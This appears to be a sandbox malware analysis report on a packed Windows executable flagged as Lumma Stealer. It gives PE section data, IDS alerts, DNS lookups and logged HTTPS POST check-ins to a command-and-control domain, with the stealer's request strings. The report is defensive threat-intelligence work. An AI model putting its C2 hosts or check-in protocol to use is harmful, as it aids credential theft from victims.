                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        or byte ptr [eax+00000000h], al
                                                                                        add byte ptr [eax], al
                                                                                        adc byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add ecx, dword ptr [edx]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        xor byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add dword ptr [eax], eax
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        mov cl, 80h
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        xor byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add al, 00h
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        and al, 00h
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        or byte ptr [eax+00000000h], al
                                                                                        add byte ptr [eax], al

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x5a0540x68.idata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x5a1f80x8.idata
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        0x10000x580000x27e00002c936e373f06907ab8bc89d0e485e4False0.9981081014890282data7.981472592877069IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .rsrc 0x590000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .idata 0x5a0000x10000x200555a11fa24a077379003c187d9c9d020False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        fiufktgl0x5b0000x2a30000x2a2400a66d7f60de2efc400db3423005ea68e0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        thfjtvjw0x2fe0000x10000x600c18ea49e5ab275b4b3856a8d2c201aa2False0.583984375data4.968199609038253IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .taggant0x2ff0000x30000x22001a658584d966161e422a6ea5d60307d5False0.09892003676470588DOS executable (COM)1.086968237601105IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                        Imports

                                                                                        DLLImport
                                                                                        kernel32.dlllstrcpy

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-10-27T01:22:10.970316+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749700172.67.170.64443TCP
                                                                                        2024-10-27T01:22:10.970316+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749700172.67.170.64443TCP
                                                                                        2024-10-27T01:22:12.156140+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749701172.67.170.64443TCP
                                                                                        2024-10-27T01:22:12.156140+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749701172.67.170.64443TCP
                                                                                        2024-10-27T01:22:15.939960+02002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749703172.67.170.64443TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Oct 27, 2024 01:22:09.572443008 CEST49700443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:09.572465897 CEST44349700172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:09.572541952 CEST49700443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:09.746068954 CEST49700443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:09.746095896 CEST44349700172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:10.390700102 CEST44349700172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:10.390780926 CEST49700443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:10.394862890 CEST49700443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:10.394867897 CEST44349700172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:10.395123959 CEST44349700172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:10.442538023 CEST49700443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:10.458851099 CEST49700443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:10.458892107 CEST49700443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:10.459000111 CEST44349700172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:10.970299006 CEST44349700172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:10.970396996 CEST44349700172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:10.970448971 CEST49700443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:10.972369909 CEST49700443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:10.972387075 CEST44349700172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:10.972403049 CEST49700443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:10.972410917 CEST44349700172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:11.035978079 CEST49701443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:11.035995007 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:11.036052942 CEST49701443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:11.036768913 CEST49701443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:11.036780119 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:11.653680086 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:11.655069113 CEST49701443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:11.655069113 CEST49701443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:11.655107975 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:11.655369043 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:11.658495903 CEST49701443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:11.658495903 CEST49701443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:11.658580065 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:12.156092882 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:12.156192064 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:12.156214952 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:12.156255007 CEST49701443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:12.156325102 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:12.156384945 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:12.156394005 CEST49701443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:12.156410933 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:12.156475067 CEST49701443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:12.307446957 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:12.307503939 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:12.307554960 CEST49701443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:12.307581902 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:12.307660103 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:12.307723045 CEST49701443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:12.307739019 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:12.308046103 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:12.308113098 CEST49701443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:12.308126926 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:12.308327913 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:12.308356047 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:12.308382034 CEST49701443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:12.308397055 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:12.308450937 CEST49701443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:12.308465004 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:12.308489084 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:12.308542013 CEST49701443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:12.311939001 CEST49701443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:12.311961889 CEST44349701172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:13.190360069 CEST49702443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:13.190401077 CEST44349702172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:13.190479994 CEST49702443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:13.191375971 CEST49702443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:13.191392899 CEST44349702172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:13.811882019 CEST44349702172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:13.811958075 CEST49702443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:13.814168930 CEST49702443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:13.814182043 CEST44349702172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:13.814894915 CEST44349702172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:13.816438913 CEST49702443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:13.816637993 CEST49702443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:13.816675901 CEST44349702172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:14.583276033 CEST44349702172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:14.583560944 CEST44349702172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:14.583569050 CEST49702443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:14.583627939 CEST49702443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:14.730247974 CEST49703443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:14.730268002 CEST44349703172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:14.730346918 CEST49703443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:14.730642080 CEST49703443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:14.730654955 CEST44349703172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:15.354218006 CEST44349703172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:15.354410887 CEST49703443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:15.355577946 CEST49703443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:15.355601072 CEST44349703172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:15.356012106 CEST44349703172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:15.357158899 CEST49703443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:15.357295036 CEST49703443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:15.357340097 CEST44349703172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:15.357441902 CEST49703443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:15.357456923 CEST44349703172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:15.940012932 CEST44349703172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:15.940259933 CEST44349703172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:15.940355062 CEST49703443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:15.940423012 CEST49703443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:15.940443039 CEST44349703172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:16.202951908 CEST49705443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:16.202996969 CEST44349705172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:16.203200102 CEST49705443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:16.203552008 CEST49705443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:16.203567982 CEST44349705172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:16.820960999 CEST44349705172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:16.821208954 CEST49705443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:16.823559999 CEST49705443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:16.823569059 CEST44349705172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:16.824040890 CEST44349705172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:16.826865911 CEST49705443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:16.827008963 CEST49705443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:16.827043056 CEST44349705172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:16.827111006 CEST49705443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:16.827119112 CEST44349705172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:17.511833906 CEST44349705172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:17.512125969 CEST44349705172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:17.512160063 CEST49705443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:17.512212992 CEST49705443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:17.885185003 CEST49711443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:17.885214090 CEST44349711172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:17.885303020 CEST49711443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:17.886228085 CEST49711443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:17.886245012 CEST44349711172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:18.533477068 CEST44349711172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:18.533709049 CEST49711443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:18.535332918 CEST49711443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:18.535340071 CEST44349711172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:18.535729885 CEST44349711172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:18.536950111 CEST49711443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:18.537071943 CEST49711443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:18.537077904 CEST44349711172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:18.890913010 CEST44349711172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:18.891028881 CEST44349711172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:18.891117096 CEST49711443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:18.891248941 CEST49711443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:18.891271114 CEST44349711172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.343657970 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.343697071 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.343765020 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.344027996 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.344044924 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.953165054 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.953237057 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.954545021 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.954551935 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.954799891 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.956110954 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.956979990 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.957014084 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.957133055 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.957168102 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.957285881 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.957329035 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.957492113 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.957531929 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.957701921 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.957736015 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.957927942 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.957964897 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.957978010 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.957984924 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.958120108 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.958137035 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.958165884 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.958322048 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.958353043 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.968116999 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.968302965 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.968333960 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:19.968354940 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.968379974 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.968406916 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.968447924 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:19.973318100 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:24.360757113 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:24.360852003 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:24.360903978 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:24.361016989 CEST49722443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:24.361030102 CEST44349722172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:24.413428068 CEST49749443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:24.413482904 CEST44349749172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:24.413572073 CEST49749443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:24.413877010 CEST49749443192.168.2.7172.67.170.64
                                                                                        Oct 27, 2024 01:22:24.413897038 CEST44349749172.67.170.64192.168.2.7
                                                                                        Oct 27, 2024 01:22:25.186126947 CEST49749443192.168.2.7172.67.170.64

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Oct 27, 2024 01:22:09.379457951 CEST5320453192.168.2.71.1.1.1
                                                                                        Oct 27, 2024 01:22:09.388345003 CEST53532041.1.1.1192.168.2.7
                                                                                        Oct 27, 2024 01:22:09.399055004 CEST6037253192.168.2.71.1.1.1
                                                                                        Oct 27, 2024 01:22:09.411726952 CEST53603721.1.1.1192.168.2.7

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Oct 27, 2024 01:22:09.379457951 CEST192.168.2.71.1.1.10xaf8dStandard query (0)presticitpo.storeA (IP address)IN (0x0001)false
                                                                                        Oct 27, 2024 01:22:09.399055004 CEST192.168.2.71.1.1.10x594cStandard query (0)crisiwarny.storeA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Oct 27, 2024 01:22:09.388345003 CEST1.1.1.1192.168.2.70xaf8dName error (3)presticitpo.storenonenoneA (IP address)IN (0x0001)false
                                                                                        Oct 27, 2024 01:22:09.411726952 CEST1.1.1.1192.168.2.70x594cNo error (0)crisiwarny.store172.67.170.64A (IP address)IN (0x0001)false
                                                                                        Oct 27, 2024 01:22:09.411726952 CEST1.1.1.1192.168.2.70x594cNo error (0)crisiwarny.store104.21.95.91A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • crisiwarny.store

                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.749700172.67.170.644436636C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-26 23:22:10 UTC263OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: crisiwarny.store
                                                                                        2024-10-26 23:22:10 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
                                                                                        2024-10-26 23:22:10 UTC1017INHTTP/1.1 200 OK
                                                                                        Date: Sat, 26 Oct 2024 23:22:10 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=821q07oqcvisnk503mbp0132s0; expires=Wed, 19 Feb 2025 17:08:49 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=53hyps05kZ4gh69CWooERwcc5H1mkC7ImtUzhgN1q%2FcHtfQ2dvlhyLB%2BK9mbs%2F%2F3rLqZkQ%2Fhv7n%2BwuHRz5y7DhuGNIE9QjXp6xcSZxKgvHfzmGODgnQq%2Fs0CRnJuoXj1%2F7r0"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d8e2fd7ddd54677-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1860&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=907&delivery_rate=1510693&cwnd=247&unsent_bytes=0&cid=21220a767df43cad&ts=599&x=0"
                                                                                        2024-10-26 23:22:10 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                        Data Ascii: 2ok
                                                                                        2024-10-26 23:22:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.749701172.67.170.644436636C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-26 23:22:11 UTC264OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 52
                                                                                        Host: crisiwarny.store
                                                                                        2024-10-26 23:22:11 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                                        2024-10-26 23:22:12 UTC1007INHTTP/1.1 200 OK
                                                                                        Date: Sat, 26 Oct 2024 23:22:12 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=g6h7vj7oe9bkqvcincp8idtcjg; expires=Wed, 19 Feb 2025 17:08:50 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CQxcT2VfI3RyKHefXZgeFigv1gOr8eXEk9T97IAjYwVS0a6CJkPFvaRhLKofFnbmen%2B6Ww8wD2xIFQQIdQIC%2FoqyjsNSS%2FVowhz6FbV6cUP3BcelQgMiyuR3ChEzjOnAyNX9"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d8e2fdf4e763aaa-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
